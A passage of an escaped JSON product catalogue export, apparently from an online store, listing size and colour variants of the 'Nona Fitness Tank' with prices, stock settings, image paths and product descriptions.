Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1675\":{\"sku\":\"WT04-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-S-Red\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1676\":{\"sku\":\"WT04-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-M-Blue\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt04-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1677\":{\"sku\":\"WT04-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-M-Purple\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1678\":{\"sku\":\"WT04-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-M-Red\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1679\":{\"sku\":\"WT04-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-L-Blue\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt04-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1680\":{\"sku\":\"WT04-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-L-Purple\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1681\":{\"sku\":\"WT04-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-L-Red\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1682\":{\"sku\":\"WT04-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nona Fitness Tank-XL-Blue\",\"description\":\"<p>It doesn\'t matter if your goal is 5 miles or an hour of Vinyasa, because our Nona Fitness Tank does it all. You don\'t have to sacrifice either -- this v-neck top features smooth, chafe-free seams and a breathable mesh back insert. Cute, too.<\\/p>\\n<p>&bull; Blue\\/white striped mesh tank.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Chafe-resistant trim around armholes and collar. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nona-fitness-tank-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt04-blue_back.jpg\",\"image\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt04-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt04-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1683\":{\"sku\":\"WT04-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\